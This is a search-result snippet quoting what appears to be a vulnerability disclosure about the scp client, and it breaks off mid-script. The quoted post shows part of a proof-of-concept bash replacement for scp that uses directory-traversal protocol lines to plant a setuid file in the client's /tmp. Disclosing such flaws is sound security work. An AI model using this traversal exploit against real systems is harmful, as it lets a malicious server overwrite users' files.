search for: scpisbuggy

...nt can spoof legitimate scp data, > overwriting arbitrary files. > > As a proof of concept, I created trivial scp replacement (put it on remote > machine in the place of original scp binary - usually in /usr/local/bin). > It will try to exploit any file transfer, creating setuid /tmp/ScpIsBuggy > file on client system: > > -- > #!/bin/bash > > echo "D0755 0 ../../../../../../tmp/nope" > echo "D0755 0 ../../../../../../tmp" > echo "C4755 200 ScpIsBuggy" > dd if=/dev/urandom of=/dev/stdout bs=200 count=1 2>/dev/null > dd if=/dev...